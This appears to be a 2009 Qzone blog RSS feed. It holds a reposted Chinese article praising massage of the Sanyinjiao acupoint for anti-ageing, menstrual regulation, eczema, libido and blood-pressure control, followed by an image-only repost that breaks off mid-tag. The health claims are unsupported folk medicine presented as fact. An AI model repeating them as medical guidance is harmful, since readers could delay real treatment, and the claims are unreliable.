<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="http://feeds.qzone.qq.com/rss.xsl" version="1.0"?>
<rss version="2.0" xmlns:qz="http://qzone.qq.com">
<channel>
<title><![CDATA[津津精品]]></title>
<description><![CDATA[刘乐乐]]></description>
<link>http://769626132.qzone.qq.com</link>
<lastBuildDate>Sun, 29 Nov 2009 20:42:42 GMT</lastBuildDate>
<generator>Qzone</generator>
<language>zh-cn</language>
<copyright>Copyright (C), 2005-2008, Tencent Tech. Co., Ltd.</copyright>
<pubDate>Wed, 18 Nov 2009 05:16:13 GMT</pubDate>

<item>
<title><![CDATA[[转]女人常揉三阴交，终身不变老!]]></title>
<link>http://769626132.qzone.qq.com/blog/1258521373</link>
<description><![CDATA[<span style="font-weight:bold"><wbr /><span style="font-size:32px;line-height:1.8em;"><span style="color:#cc0000;line-height:1.8em;"></span><wbr /></span><wbr /></span><wbr /><object codeBase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab#version=8,0,0,0" height="100" width="410" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" name="musicFlash**" id="musicFlash0" src="http://imgcache.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" ubb="399538|3|http://stream5.qqmusic.qq.com:0/399538.wma|吉祥如意|5829|凤凰传奇"><param value="http://imgcache.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" name="movie" /><param value="#ffffff" name="bgColor" /><param value="showall" name="scale" /><param value="transparent" name="wmode" /><param value="true" name="menu" /><param value="always" name="allowScriptAccess" /></object><wbr /> <br><span style="font-weight:bold"><wbr /><span style="font-size:32px;line-height:1.8em;"><span style="color:#cc0000;line-height:1.8em;"><span style="font-family:'新宋体';line-height:1.8em;"></span><wbr /></span><wbr /></span><wbr /></span><wbr /> <br><span style="font-weight:bold"><wbr /><span style="color:#cc0000;line-height:1.8em;"><span style="font-family:'新宋体';line-height:1.8em;"><span style="font-size:32px;line-height:1.8em;">女人常揉三阴交 终身不变老</span><wbr /></span><wbr /></span><wbr /></span><wbr /><br><a href="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=f75eb45091606c86a0f45e20dff774bf9cbc101054e5511e8f2dc7e594bdaa656a0727526ddcc12d55bddfd6472c4531f617e34d727db1dcffd697d5ba57b887679457b0f0cc685fe3143341916cbd108e3c2417" target="_blank"><span style="color:#cc0000;line-height:1.8em;"><wbr /><a href="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=f75eb45091606c86a0f45e20dff774bf9cbc101054e5511e8f2dc7e594bdaa656a0727526ddcc12d55bddfd6472c4531f617e34d727db1dcffd697d5ba57b887679457b0f0cc685fe3143341916cbd108e3c2417" target="_blank"><img style="border:0;" src="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=f75eb45091606c86a0f45e20dff774bf9cbc101054e5511e8f2dc7e594bdaa656a0727526ddcc12d55bddfd6472c4531f617e34d727db1dcffd697d5ba57b887679457b0f0cc685fe3143341916cbd108e3c2417" /></a><wbr /></span><wbr /></a><wbr /><br><br>　　 <span style="font-size:24px;line-height:1.8em;">常揉三阴交，终身不变老 如果你的父母给你存了一笔几千万的财产，你却不知道用。还每天到处借钱，过得穷困潦倒，那是多么可惜的事情呀？ <br>　　 <br>　　爱美是女人的天性，如今日子越过越好，保养的方法也层出不穷。很多人，花了大把的时间和金钱，却眼睁睁的看衰老爬上自己的脸庞和身体。内心充满了愤怒、失望、怅惘…… <br></span><wbr />　　 <br>　　<span style="font-size:24px;line-height:1.8em;">其实，三阴交穴就是我们的父母留给我们的巨额财产。可以帮助我们维持年轻，延缓衰老，推迟更年期，保证女人的魅力。三阴交穴在小腿内侧，脚踝骨的最高点往上三寸处（自己的手横着放，约四根手指横着的宽度）。三阴交对女人、对人体究竟有什么神奇作用呢？ <br></span><wbr /><a href="http://pic.dbw.cn/0/02/70/03/2700372_947124.jpg" target="_blank"><wbr /><a href="http://pic.dbw.cn/0/02/70/03/2700372_947124.jpg" target="_blank"><img style="border:0;" src="http://pic.dbw.cn/0/02/70/03/2700372_947124.jpg" /></a><wbr /></a><wbr /><br>                   <br>　　 <br>　　 <span style="font-size:24px;line-height:1.8em;">1、保养子宫和卵巢 人体的任脉、督脉、冲脉这三条经脉的经气都同起于胞宫（子宫和卵巢）。其中，任脉主管人体全身之血，督脉主管人体全身之气，冲脉是所有经脉的主管。每天晚上5点—7点，肾经当令之时，用力按揉每条腿的三阴交穴各15分钟左右，能保养子宫和卵巢。促进任脉、督脉、冲脉的畅通。女人只要气血畅通，就会面色红润白里透红，睡眠踏实，皮肤和肌肉不垮不松。 <br></span><wbr />　　 <br>　　 <span style="font-size:24px;line-height:1.8em;">2、紧致脸部肌肉，使脸部不下垂 看看张曼玉和赵雅芝，现在脸都紧紧的，没有松垮下来，因为她们的饮食都很规律，脾没有受到伤害。再看看大美人关之琳，经常在家开Part，饮食无节制，喝酒无节制，伤了脾，脸部现在松弛得非常明显，老态骤然显现。经常伤害脾，脸上及全身肌肉都会更快的松弛。如果想在40岁之后，还能对抗地球的引力，保证脸部和胸部不下垂。除了饮食要规律之外，还要经常在晚上9点左右，三焦经当令之时，按揉左右腿的三阴交穴各20分钟健脾，因为三阴交是脾经的大补穴哦。</span><wbr /> <br>　　 <br>　　<span style="font-size:24px;line-height:1.8em;"> 3、调月经，去斑，去皱，祛痘 三阴交是脾、肝、肾三条经络相交汇的穴位。其中，脾化生气血，统摄血液。肝藏血，肾精生气血。女人只要气血足，那些月经先期、月经后期、月经先后无定期、不来月经等统称为月经不调的疾病都会消失。而女人脸上长斑、痘、皱纹，其实都与月经不调有关。只要每天晚上9点—11点，三焦经当令之时，按揉两条腿的三阴交各15分钟，就能调理月经，祛斑、祛痘、去皱。不过，要坚持才有效果哦，坚持每天按揉，按揉一个月之后，才能看得到效果。如果指望一两天就看到效果，只能是做梦了。</span><wbr /> <br>　　 <br>　　 <span style="font-size:24px;line-height:1.8em;">4、改善性冷淡 很多女性面对高压的生活节奏，或者因为自身饮食结构或生活习惯不合理，导致性冷淡。这样不但自己少了很多生活的乐趣，还影响夫妻感情，容易导致家庭不稳。三阴交是一个大补穴，能补气补血，提升女人的性欲，让女人逃离性冷淡，重温浪漫人生。每天晚上5点—7点，肾经当令之时，按揉三阴交，提升性欲的效果最好。坚持一个月，定能收到你想要的效果。 </span><wbr /><span style="font-size:24px;line-height:1.8em;"></span><wbr /> <br><span style="font-size:24px;line-height:1.8em;"><br></span><wbr />　　 <span style="font-size:24px;line-height:1.8em;">5、调治肌肤过敏，湿疹，荨麻疹，皮炎 三阴交是脾经的大补穴。脾最大的功能之一是能够把人体的水湿浊毒运化出去。每天中午11点，脾经当令之时，按揉左右腿的三阴交各20分钟，能把身体里面的湿气、浊气、毒素都给排出去。皮肤之所以过敏，长湿疹，荨麻疹，皮炎等毛病，都是体内的湿气、浊气、毒素在捣乱。只要按揉三阴交，把这些讨厌的调皮鬼赶出去，不出一个半月，皮肤就能恢复光洁细腻，干净无暇了。 <br></span><wbr />　　 <br>　　 <span style="font-size:24px;line-height:1.8em;">6、保持血压稳定 三阴交是一个智能调节穴位。当你血压过高或过低，每天中午11点—13点，心经当令之时，用力按揉两条腿的三阴交各20分钟，坚持两三个月，能把血压调理至正常值。 <br>　　另外，三阴交还能调治脾胃虚弱，消化不良，腹胀腹泻，白带过多，子宫下垂，全身水肿，眼袋浮肿，小便不利，脚气，失眠等症。</span><wbr /> <br>　　 <br>　　<span style="font-size:24px;line-height:1.8em;">我有位邻居王教授，是位退休的老中医。老太太今年71岁，脸上一个老年斑都没有，脸皮紧紧的没有松弛现象，皱纹只有浅浅的几根。说话声音洪亮，中气十足。每次去爬香山，中途从不休息，都是一口气爬上去的，还不大喘气。在我的一再套近乎下，老人透露了她的保养秘诀：保持心情愉快，饮食清淡，适量运动，充足的睡眠，每天按揉三阴交，每条腿的三阴交至少按揉或用经络锤敲打10分钟以上。 </span><wbr /><span style="font-size:24px;line-height:1.8em;"><br></span><wbr />　　 <br>　　<span style="font-size:24px;line-height:1.8em;">对于穴位的按揉，不要指望一两天出效果。一定要像王教授这样坚持，坚持才有效果。父母生我们时，三阴交这个大补穴已经在我们身上了，等于是父母给我们往抗衰老银行里存了一笔巨额财产。既然是父母无私的赠与，我们为什么不好好利用呢？每天坚持按揉链条腿的三阴交各15分钟以上，还惧怕岁月的侵蚀吗？如果感觉用手指按揉比较累，可以用经络锤敲打，或者用筷子头按揉，效果也一样哦。</span><wbr /> <div style="text-align:center;"> </div><br><a href="http://cache.mars.sina.com.cn/nd/vipbook/chapterpic/53/102/source/chapter_09ef52f234588167cd2d52237e24d4f2.jpg" target="_blank"><wbr /><a href="http://cache.mars.sina.com.cn/nd/vipbook/chapterpic/53/102/source/chapter_09ef52f234588167cd2d52237e24d4f2.jpg" target="_blank"><img style="border:0;" src="http://cache.mars.sina.com.cn/nd/vipbook/chapterpic/53/102/source/chapter_09ef52f234588167cd2d52237e24d4f2.jpg" /></a><wbr /></a><wbr />     <div style="text-align:center;"> </div><div style="text-align:center;"> </div><a href="http://www.sznews.com/health/content/2009-06/30/content_3876400_3.htm" target="_blank"></a><wbr /><a href="http://www.sznews.com/health/images/attachement/jpg/site3/20090630/001558d8be910bb3a41263.jpg" target="_blank"><wbr /><a href="http://www.sznews.com/health/images/attachement/jpg/site3/20090630/001558d8be910bb3a41263.jpg" target="_blank"><img style="width:0px;height:281px;border:0;" src="http://www.sznews.com/health/images/attachement/jpg/site3/20090630/001558d8be910bb3a41263.jpg" /></a><wbr /></a><wbr /> <br><div style="text-align:center;"> </div><br>　女人想更健康美丽往下看： <br>　　 <br>　<span style="font-size:32px;line-height:1.8em;">　</span><wbr /><span style="font-size:32px;line-height:1.8em;">女人病：</span><wbr /> <br>　　 <br>　　<span style="font-size:24px;line-height:1.8em;"> 1、三阴交：在脚内踝尖上7cm左右，小腿胫骨后缘的地方。点按可活血又可止血，滋阴利湿。 <br>　　 <br>　　 2、经后乏力、腰酸腿疼，吃六味地黄丸。 <br>　　 <br>　　 3、月经淋漓不止。原因是脾不统血、气虚下陷。平日吃补中益气丸，红枣。月经期服八珍颗粒两袋和三七粉（同仁堂）一瓶。 <br></span><wbr />　　 <br>　　 <span style="font-size:24px;line-height:1.8em;">4、经量少，滞涩难下，久久不来，平日以山楂煮水喝，可加红糖。 </span><wbr /><span style="font-size:24px;line-height:1.8em;"><br></span><wbr />　　 <br><span style="font-size:32px;line-height:1.8em;">　　</span><wbr /><span style="font-size:32px;line-height:1.8em;">美容篇： </span><wbr /><span style="font-size:32px;line-height:1.8em;"><br></span><wbr />　　 <br>　　<span style="font-size:24px;line-height:1.8em;"> 1、用手指肚敲头2分钟、梳头2分钟。头上有膀胱经、胆经、三焦经、胃经。 <br>　　 <br>　　 2、用手指肚敲面部、额头、眉骨、鼻子、下巴。 <br>　　 <br>　　 3、敲胳膊上的大肠经（从上臂到手腕都要敲）。 <br>　　 <br>　　 4、刺激按揉丝竹空（靠太阳穴那端的眉尖），可防长斑，减少鱼尾纹。 <br>　　 </span><wbr /><span style="font-size:24px;line-height:1.8em;"><br></span><wbr />　　<span style="font-size:32px;line-height:1.8em;">养胃篇： </span><wbr /><span style="font-size:32px;line-height:1.8em;"><br></span><wbr />　　 <br>　　<span style="font-size:24px;line-height:1.8em;">要补血先健脾胃。气血不足，大便必然无力而下。养胃的重点是排“三浊”--浊气、浊水、浊便。小屁、蔫屁、臭屁是放肠胃产生的浊气；响而不臭的屁，是肝胆的浊气。 <br>　　 <br>　　 1、推腹法：从心脏下部开始推，只要是从上往下推，怎么推都行。将脾胃或肝经的废气排泄，引气血重新灌注而解脾胃寒的问题。 <br>　　 <br>　　 2、山药、薏米（1：1的比例）打粉熬粥。健脾祛湿，增长气血。肝火旺、脾胃虚弱者都可以食。有齿痕就是脾虚。 <br>　　 <br>　　多吃红枣，补气血。 <br>　　 <br>　　吃完肉、要吃大山楂丸帮助消化。 <br>　　 <br>　　 3、金鸡独立：闭眼，任意抬起一只脚，用意念保持身体平衡，把气血引到脚上，一会就会满身出汗。跟热水泡脚的功效差不多。 <br>　　 <br>　　 4、睡眠质量不好就是肠胃的原因。先按太冲穴，补足心血，再敲胆经。排气多了，大便也色深味重了。这说明肝胆之毒素从肠道排出了。 <br></span><wbr /><br>　　 <br>　　<span style="font-size:32px;line-height:1.8em;">小贴士：</span><wbr /><span style="font-size:32px;line-height:1.8em;"> <br></span><wbr />　　 <br>　　<span style="font-size:24px;line-height:1.8em;">找穴位：手摸有沙粒或者硬条一样的东西。揉法要让力量透下去。腿上的经要由上向下推，胳膊上的经要由下向上推。 <br>　　 <br>　　磨牙：气郁不舒或精神紧张造成。吃逍遥丸以健脾舒肝，还可吃白萝卜通通气。气顺痰自消。 <br>　　 <br>　　感冒：取嚏法。驱除体内的寒气，感冒自消。 <br></span><wbr /><br><br><br><a href="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=f75eb45091606c86a0f45e20dff774bf6fa18dc051c6e5854a1de7bafa51a6950d3b199dbf65fbb169f386c35bf6f44f8af4c46b682c61692b32d67177a2d026fd96eb43d7b7a66a0cc114885f445489e5244031" target="_blank"><wbr /><a href="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=f75eb45091606c86a0f45e20dff774bf6fa18dc051c6e5854a1de7bafa51a6950d3b199dbf65fbb169f386c35bf6f44f8af4c46b682c61692b32d67177a2d026fd96eb43d7b7a66a0cc114885f445489e5244031" target="_blank"><img style="border:0;" src="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=f75eb45091606c86a0f45e20dff774bf6fa18dc051c6e5854a1de7bafa51a6950d3b199dbf65fbb169f386c35bf6f44f8af4c46b682c61692b32d67177a2d026fd96eb43d7b7a66a0cc114885f445489e5244031" /></a><wbr /></a><wbr /> <div style="text-align:center;"><br> </div> <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[769626132@qq.com(津津精品)]]></author>
<comments>http://769626132.qzone.qq.com/blog/1258521373#comment</comments>
<qz:effect>134234633</qz:effect>
<pubDate>Wed, 18 Nov 2009 05:16:13 GMT</pubDate>
<guid>http://769626132.qzone.qq.com/blog/1258521373</guid>
</item>

<item>
<title><![CDATA[[转]偷菜的后果]]></title>
<link>http://769626132.qzone.qq.com/blog/1258521109</link>
<description><![CDATA[<wbr /><a href="http://cnc.imgcache.qq.com/ac/b.gif" target="_blank"><img style="border:0;" src="http://cnc.imgcache.qq.com/ac/b.gif" /></a><wbr /> <br><wbr /><a href="http://cnc.imgcache.qq.com/ac/b.gif" target="_blank"><img style="border:0;" src="http://cnc.imgcache.qq.com/ac/b.gif" /></a><wbr /> <a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf09c4184951a603b11c4f3de3e90a1f9ebc6a4b213d0e78042235f5f3f5bb7bc4fbba0037ccf34f51b3e12b4a08e02dba6dad02daa8ca1926a58f2e08b82e2e72bf916fd2" target="_blank"><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf09c4184951a603b11c4f3de3e90a1f9ebc6a4b213d0e78042235f5f3f5bb7bc4fbba0037ccf34f51b3e12b4a08e02dba6dad02daa8ca1926a58f2e08b82e2e72bf916fd2" target="_blank"><img style="width:670px;height:421px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf09c4184951a603b11c4f3de3e90a1f9ebc6a4b213d0e78042235f5f3f5bb7bc4fbba0037ccf34f51b3e12b4a08e02dba6dad02daa8ca1926a58f2e08b82e2e72bf916fd2" /></a><wbr /></a><wbr /><br><a href="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf8c829fd82a93c282bca5bf300eec0ae5979c87bc81bd5e086c8b6981383b0ec463bd2df461b163a911c6077f72e33b06036f98310f2b650e1209f54c0571dacf5d83f4a6" target="_blank"><wbr /><a href="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf8c829fd82a93c282bca5bf300eec0ae5979c87bc81bd5e086c8b6981383b0ec463bd2df461b163a911c6077f72e33b06036f98310f2b650e1209f54c0571dacf5d83f4a6" target="_blank"><img style="width:670px;height:411px;border:0;" src="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf8c829fd82a93c282bca5bf300eec0ae5979c87bc81bd5e086c8b6981383b0ec463bd2df461b163a911c6077f72e33b06036f98310f2b650e1209f54c0571dacf5d83f4a6" /></a><wbr /></a><wbr /><br><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf24d4cdf6f15da9b8b8dde7917b833cc2f342e6c88d2c4d7fcf566c9d8b746e9f88f53d71fee32f09c5c2ed4d67b4d57d574b5209c19f6a7166744918372be0247f88478d" target="_blank"><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf24d4cdf6f15da9b8b8dde7917b833cc2f342e6c88d2c4d7fcf566c9d8b746e9f88f53d71fee32f09c5c2ed4d67b4d57d574b5209c19f6a7166744918372be0247f88478d" target="_blank"><img style="width:670px;height:395px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf24d4cdf6f15da9b8b8dde7917b833cc2f342e6c88d2c4d7fcf566c9d8b746e9f88f53d71fee32f09c5c2ed4d67b4d57d574b5209c19f6a7166744918372be0247f88478d" /></a><wbr /></a><wbr /><br><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf0b08aba3246a88ab50585c69e48b7a0c31d51e4d6d1c0f979a83772ab5002c21eb57d48d174c20d34f8e3f97cb5fba45b888e2e9ec53b8feea3785754b619f35fd78631f" target="_blank"><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf0b08aba3246a88ab50585c69e48b7a0c31d51e4d6d1c0f979a83772ab5002c21eb57d48d174c20d34f8e3f97cb5fba45b888e2e9ec53b8feea3785754b619f35fd78631f" target="_blank"><img style="width:670px;height:406px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf0b08aba3246a88ab50585c69e48b7a0c31d51e4d6d1c0f979a83772ab5002c21eb57d48d174c20d34f8e3f97cb5fba45b888e2e9ec53b8feea3785754b619f35fd78631f" /></a><wbr /></a><wbr /><br><a href="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cff3aeb4fa63cd35131c257d38665450f590ca7c1a6a2716a51f73eba686345560239c8eb6e5c55d4235b02c1a7c422f86172e79a045322bad944d80bac939cc7aeb245fd4" target="_blank"><wbr /><a href="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cff3aeb4fa63cd35131c257d38665450f590ca7c1a6a2716a51f73eba686345560239c8eb6e5c55d4235b02c1a7c422f86172e79a045322bad944d80bac939cc7aeb245fd4" target="_blank"><img style="width:670px;height:395px;border:0;" src="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cff3aeb4fa63cd35131c257d38665450f590ca7c1a6a2716a51f73eba686345560239c8eb6e5c55d4235b02c1a7c422f86172e79a045322bad944d80bac939cc7aeb245fd4" /></a><wbr /></a><wbr /><br><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf3c8eb2f66a0b03fae428fc15a136a37a38a542ebb4418efdf8b3a7df85d6b5282326ca4f0726f24c4a95bac8e185c2e9cf5e928e9fc5bda4d259e2687c227fd28ea4cc7b" target="_blank"><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf3c8eb2f66a0b03fae428fc15a136a37a38a542ebb4418efdf8b3a7df85d6b5282326ca4f0726f24c4a95bac8e185c2e9cf5e928e9fc5bda4d259e2687c227fd28ea4cc7b" target="_blank"><img style="width:670px;height:421px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf3c8eb2f66a0b03fae428fc15a136a37a38a542ebb4418efdf8b3a7df85d6b5282326ca4f0726f24c4a95bac8e185c2e9cf5e928e9fc5bda4d259e2687c227fd28ea4cc7b" /></a><wbr /></a><wbr /><br><a href="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf8f5d58585d1a9ac6574687fc077c6dcbe88805521ed225b50997164a9a5e80e2b389b5d98b2e61b5214e17661b6d64cd17cea621312082862ef757009ce2eac6ab339660" target="_blank"><wbr /><a href="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf8f5d58585d1a9ac6574687fc077c6dcbe88805521ed225b50997164a9a5e80e2b389b5d98b2e61b5214e17661b6d64cd17cea621312082862ef757009ce2eac6ab339660" target="_blank"><img style="width:670px;height:437px;border:0;" src="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf8f5d58585d1a9ac6574687fc077c6dcbe88805521ed225b50997164a9a5e80e2b389b5d98b2e61b5214e17661b6d64cd17cea621312082862ef757009ce2eac6ab339660" /></a><wbr /></a><wbr /><br><a href="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf800853d67a25c9f206192805d02995ef1766290b314e8e549b1d8a7f972dd5762d94f7e4983cfab7a695891150171ac040595956b569cf6bdfbe77c317126d8c364fb442" target="_blank"><wbr /><a href="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf800853d67a25c9f206192805d02995ef1766290b314e8e549b1d8a7f972dd5762d94f7e4983cfab7a695891150171ac040595956b569cf6bdfbe77c317126d8c364fb442" target="_blank"><img style="width:670px;height:406px;border:0;" src="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf800853d67a25c9f206192805d02995ef1766290b314e8e549b1d8a7f972dd5762d94f7e4983cfab7a695891150171ac040595956b569cf6bdfbe77c317126d8c364fb442" /></a><wbr /></a><wbr /><br><a href="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf008f84328c53007d186cfbda001858e16368d7119f149e31a501aa3242888685114c22026bcc5db91aedb7b6786d6da72964e44df6c15a24369b445ea06fe2a0e9610c47" target="_blank"><wbr /><a href="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf008f84328c53007d186cfbda001858e16368d7119f149e31a501aa3242888685114c22026bcc5db91aedb7b6786d6da72964e44df6c15a24369b445ea06fe2a0e9610c47" target="_blank"><img style="width:670px;height:395px;border:0;" src="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf008f84328c53007d186cfbda001858e16368d7119f149e31a501aa3242888685114c22026bcc5db91aedb7b6786d6da72964e44df6c15a24369b445ea06fe2a0e9610c47" /></a><wbr /></a><wbr /><br><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf65c68128b9f8c5c43c4936bdd537970c81e51f811b93648a9aac901c275859fd0c2ecb84ce7695c8727cd875472c2341b893342a74b56d6147916fbb15cd5fda85d3b8f5" target="_blank"><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf65c68128b9f8c5c43c4936bdd537970c81e51f811b93648a9aac901c275859fd0c2ecb84ce7695c8727cd875472c2341b893342a74b56d6147916fbb15cd5fda85d3b8f5" target="_blank"><img style="width:670px;height:395px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf65c68128b9f8c5c43c4936bdd537970c81e51f811b93648a9aac901c275859fd0c2ecb84ce7695c8727cd875472c2341b893342a74b56d6147916fbb15cd5fda85d3b8f5" /></a><wbr /></a><wbr /><br><a href="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf306f21a1c33e53f004aa4fbaaa4d21f6a066a5041d149b7948504dfe89be500296535235f5944ec9d6e717e97a32b57c00cd686dc6d971ac9caa757d487ef1fc9e435a59" target="_blank"><wbr /><a href="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf306f21a1c33e53f004aa4fbaaa4d21f6a066a5041d149b7948504dfe89be500296535235f5944ec9d6e717e97a32b57c00cd686dc6d971ac9caa757d487ef1fc9e435a59" target="_blank"><img style="width:670px;height:406px;border:0;" src="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf306f21a1c33e53f004aa4fbaaa4d21f6a066a5041d149b7948504dfe89be500296535235f5944ec9d6e717e97a32b57c00cd686dc6d971ac9caa757d487ef1fc9e435a59" /></a><wbr /></a><wbr /><br><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf6d515c3698d67cbb22bedaec14baacec881f672bedac472620c43cb0c7fc850ba71c0326688469bced20ebe8537d76b86090c96fb2e6900e977a4786552edbdd3f59e241" target="_blank"><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf6d515c3698d67cbb22bedaec14baacec881f672bedac472620c43cb0c7fc850ba71c0326688469bced20ebe8537d76b86090c96fb2e6900e977a4786552edbdd3f59e241" target="_blank"><img style="width:670px;height:406px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf6d515c3698d67cbb22bedaec14baacec881f672bedac472620c43cb0c7fc850ba71c0326688469bced20ebe8537d76b86090c96fb2e6900e977a4786552edbdd3f59e241" /></a><wbr /></a><wbr /><br><a href="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cfb20c7775c0e65b688cd6284e3b34996988e712d1e2c61f31e5f66fc61a2e0bdf7708c87684c3e47b7f1ac3fd3ec880bd354681313033eb8b9997d95a0593c8159b980906" target="_blank"><wbr /><a href="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cfb20c7775c0e65b688cd6284e3b34996988e712d1e2c61f31e5f66fc61a2e0bdf7708c87684c3e47b7f1ac3fd3ec880bd354681313033eb8b9997d95a0593c8159b980906" target="_blank"><img style="width:670px;height:411px;border:0;" src="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cfb20c7775c0e65b688cd6284e3b34996988e712d1e2c61f31e5f66fc61a2e0bdf7708c87684c3e47b7f1ac3fd3ec880bd354681313033eb8b9997d95a0593c8159b980906" /></a><wbr /></a><wbr /><br><a href="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cfde3d3a9cc937a87d25319e495561f9fe4b8758a1fa271be1bc82a3f584762058366dd16176e8394d35ed92686bc23fc2ebc7e9598515d2ba51da100e2b9bc6877e05fd40" target="_blank"><wbr /><a href="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cfde3d3a9cc937a87d25319e495561f9fe4b8758a1fa271be1bc82a3f584762058366dd16176e8394d35ed92686bc23fc2ebc7e9598515d2ba51da100e2b9bc6877e05fd40" target="_blank"><img style="width:670px;height:503px;border:0;" src="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cfde3d3a9cc937a87d25319e495561f9fe4b8758a1fa271be1bc82a3f584762058366dd16176e8394d35ed92686bc23fc2ebc7e9598515d2ba51da100e2b9bc6877e05fd40" /></a><wbr /></a><wbr /><br><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf56f25e2b76566cac227a6c979ed726dc168643b710ef3df9bdeb8762b95ded112c48b883f3c60661e93ad190dbfff77eaccb546813553df1441ab1a354da5e104ad51969" target="_blank"><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf56f25e2b76566cac227a6c979ed726dc168643b710ef3df9bdeb8762b95ded112c48b883f3c60661e93ad190dbfff77eaccb546813553df1441ab1a354da5e104ad51969" target="_blank"><img style="width:670px;height:411px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf56f25e2b76566cac227a6c979ed726dc168643b710ef3df9bdeb8762b95ded112c48b883f3c60661e93ad190dbfff77eaccb546813553df1441ab1a354da5e104ad51969" /></a><wbr /></a><wbr /><br><a href="http://b19.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf47a4b86db272be044f944038c1b5e864e791ee0d6c07dd5d57e41bb14e832b639720001261ca6971df2c0befe053082260bea49c8b15130a2eb2fbccdcabe84129b90bfd" target="_blank"><wbr /><a 